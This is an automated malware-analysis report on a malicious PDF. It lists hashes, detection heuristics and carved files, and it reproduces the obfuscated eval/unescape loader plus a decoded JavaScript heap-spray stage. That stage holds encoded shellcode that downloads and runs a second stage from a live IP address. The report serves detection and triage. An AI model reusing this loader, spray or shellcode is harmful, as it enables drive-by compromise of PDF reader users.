PDF malware analysis — malicious · 58402d3f9d5d6ebb

MALICIOUS

PDF

29.3 KB First seen: 2026-05-09

MD5: f0375246b761bb9e13f93e90b3d693b9 SHA-1: 3aaf137c552c69242bdb2abdba23eb113190f004 SHA-256: 58402d3f9d5d6ebbbba49314fe4f985e7ac95e488be842600705ddc8a02d3c19

424 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF contains embedded JavaScript that utilizes `unescape` and `String.fromCharCode` for obfuscation, a common technique for exploiting PDF vulnerabilities. The script is designed to download a second-stage payload from the URL `http://78.159.122.177/w/l.php?i=13`. This behavior is strongly indicative of a downloader or exploit kit stage.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 9

ClamAV: Pdf.Exploit.Agent-36098 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-36098
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*//*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/eval(/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*//*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/unescape(/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/this.subject.replace(/Normal/mig,String.fromCharCode(50-10-3)).replace(/Pokemon/mig,'B')/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/)/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/);

PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
RichMedia (Flash) high PDF_RICHMEDIA

PDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded file low PDF_EMBEDDED

PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://78.159.122.177/w/l.php?i=13 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`SWFNAME.swf`	pdf-embedded-file	PDF EmbeddedFile object 16 at offset 0xC27	26777 bytes
SHA-256: `a98024b4ee1377e872e3ebaf1c361600c270db5fd5ba79f256106c0c566dde29`
Detection ClamAV: Pdf.Exploit.Agent-35955 Obfuscation or payload: likely actual_type=SWF; declared_or_context_type=PDF; filename=SWFNAME.swf; kind=pdf-embedded-file Carved artifact entropy is 7.99, consistent with packed or encrypted content.
`javascript_obj0006_000.js`	pdf-javascript-stream	PDF /JS object 6 at offset 0x82B	462 bytes
SHA-256: `e1ab3bbf30605cecdce6db9d2556198626dbb178f7a4cb471a9436bb6e8bd92f`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script /pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi//pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi/eval(/pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi//pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi/unescape(/pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi/this.subject.replace(/Normal/mig,String.fromCharCode(50-10-3)).replace(/Pokemon/mig,'B')/pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi/)/pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi/);
`legacy_pdfkit_stage_000.js`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x64	3470 bytes
SHA-256: `2bb12043ad750419a6c9f63b83e389cbcc0e2d5620c930ba40554d28de68a793`
Preview script First 1,000 lines of the extracted script var u = unescape;var s = u('%u0c0c%u0c0c%u4919%u0700%ucccc%ucccc%u48ef%u0700%u156f%u0700%ucccc%ucccc%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9033%u0700%u9084%u0700%u0c0c%u0c0c%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0c0c%u0c0c%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u372f%u2e38%u3531%u2e39%u3231%u2e32%u3731%u2f37%u2f77%u2e6c%u6870%u3f70%u3d69%u3331%u9000');var n = u('%u0c0c%u0c0c');while (n.length + 28 < 0x10000){n+=n;}o = n.substring(0, 0x5f4);o += s;o += n;p = o.substring(0, 0x8000);while(p.length < 0x80000){p += p;}q = p.substring(0, 0x7ff74);var m = new Array();for (i=0;i<0x1f0;i++){m[i]=q+'s';}

Open this report in the interactive analyzer, or submit your own file for analysis.